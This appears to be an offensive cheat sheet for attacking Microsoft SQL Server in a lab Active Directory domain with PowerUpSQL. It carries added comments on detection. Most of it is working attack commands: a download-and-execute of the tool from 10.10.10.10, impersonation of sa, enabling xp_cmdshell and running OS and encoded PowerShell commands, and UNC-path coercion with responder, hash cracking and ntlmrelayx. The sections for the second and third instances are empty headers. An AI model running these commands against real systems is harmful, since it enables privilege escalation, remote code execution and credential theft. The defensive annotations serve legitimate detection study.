PowerUpSQL
First Instance
# Import PowerUpSQL
# Fetches the module over plain HTTP and runs it in memory with Invoke-Expression (iex);
# nothing is written to disk, so the host-side traces are PowerShell script-block /
# module logging and the outbound HTTP request to 10.10.10.10.
iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUpSQL.ps1')
# Discovery and verify network access
# Get-SQLInstanceDomain lists instances registered as SQL Server SPNs in AD;
# Get-SQLConnectionTest then attempts a login to each one. That is one login attempt per
# instance - failed logins are written to each instance's error log under the default
# login-audit setting, and the explicit -Username/-Password form below puts the password
# on the command line (PowerShell history / transcripts).
Get-SQLInstanceDomain | Get-SQLConnectionTest
Get-SQLInstanceDomain | Get-SQLConnectionTest -Username vulnableone.local\khan.chanthou -Password Password123
# Local Instance
# Instances installed on the host the script runs on; no network access involved.
Get-SQLInstanceLocal
# Verify Server Information
# Version and service details for one instance. -Instance takes "host,port".
Get-SQLServerInfo -Instance "appsrv.vulnableone.local,1433"
# Find Link
# Linked servers defined on this instance, i.e. other servers it can reach with stored
# or pass-through credentials.
Get-SQLServerLink -Instance "APPSRV.vulnableone.local,1433"
# Find Link automatically
# Follows linked servers recursively (link -> link -> ...), running queries on every hop.
Get-SQLServerLinkCrawl -Instance "APPSRV.vulnableone.local,1433"
# Query
# Ad-hoc T-SQL through Get-SQLQuery. This first group is read-only context enumeration:
# instance name, the database user the login maps to (two spellings), sysadmin logins,
# database users, databases and linked-server names. syslogins / sysusers / sysservers
# are legacy compatibility views; sys.server_principals, sys.database_principals and
# sys.servers are the current equivalents and show the same data.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select @@servername"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select CURRENT_USER"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select user_name()"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select loginname from syslogins where sysadmin = 1"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select * from sysusers" | select name
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select name from sys.databases"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "select srvname from sysservers"
# sp_linkedservers lists the links; sp_helplinkedsrvlogin shows the login mapping each link
# uses (caller's own context vs. a stored remote login) - the stored-login case is what a
# reviewer should look at, since it lets any caller act as that remote login.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "exec sp_linkedservers"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "exec sp_helplinkedsrvlogin"
# rpcout = whether 'rpc out' is enabled on each link.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT srvname, srvproduct, rpcout FROM master..sysservers"
# Verify sysadmin privilege
# IS_SRVROLEMEMBER('sysadmin') returns 1 when the current login is in the sysadmin role.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT IS_SRVROLEMEMBER('sysadmin')"
# Same check after switching context to 'sa'. EXECUTE AS LOGIN only succeeds when the
# current login holds IMPERSONATE on the target login (or is already sysadmin), so a
# result of 1 here means the login below has an impersonation path to sa.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS login = 'sa'; SELECT IS_SRVROLEMEMBER('sysadmin')"
# Finding Impersonate
# Joins on grantor_principal_id, so the output is the set of logins that *can be*
# impersonated by someone; it does not show who holds the permission. To see the holder,
# also select a.grantee_principal_id (joined to sys.server_principals).
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'"
# Enable RPC Out  (header originally read "RCP_Out")
# Both lines are configuration writes on the linked-server entry 'APPSRV01', made while
# impersonating sa. NOTE(review): 'rcp' on the second line is not a documented
# sp_serveroption name - presumably a typo of 'rpc'.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption 'APPSRV01','rpc out','true'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption 'APPSRV01','rcp', 'true'"
# Verify xp_cmdshell, value = 1, value_in_use =1
# value = configured setting, value_in_use = running setting; xp_cmdshell is 0 (off) by
# default, so a 1 in either column on a production instance is worth explaining.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'"
# Enable xp_cmdshell, used Login As
# Every sp_configure change followed by RECONFIGURE writes a "Configuration option '...'
# changed from 0 to 1" line to the SQL Server error log - a cheap detection point for
# both 'show advanced options' and 'xp_cmdshell'.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options',1;RECONFIGURE ;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE"
# Impersonate and Execute Command
# xp_cmdshell runs the OS command as the SQL Server service account, as a child process of
# sqlservr.exe (cmd.exe -> powershell.exe). A Defender preference change from that process
# tree is logged as a Defender configuration-change event (Operational log 5007); 'whoami'
# shows which service account those commands run under; 'base64' on the last line is a
# placeholder for an encoded command block, which command-line auditing records verbatim.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'powershell -c Set-MpPreference -DisableRealtimeMonitoring $False -Verboes'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'whoami'"
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXECUTE AS LOGIN = 'sa'; exec xp_cmdshell 'powershell -enc base64'"
# UNC Path
# xp_dirtree on a UNC path makes the SQL Server service account authenticate to
# 10.10.10.10 over SMB; the responder / ntlmrelayx lines that follow consume that NTLM
# authentication. Egress filtering of SMB from the database tier stops the connection,
# and SMB signing on the relay target stops the relay.
Get-SQLQuery -Instance "APPSRV.vulnableone.local,1433" -Query "EXEC xp_dirtree '\\10.10.10.10\test'"
└─$ sudo responder -I tun0 -v #Capture Hash
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt #CrackHash
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10 #NTLM Relay
Second Instance
Third Instance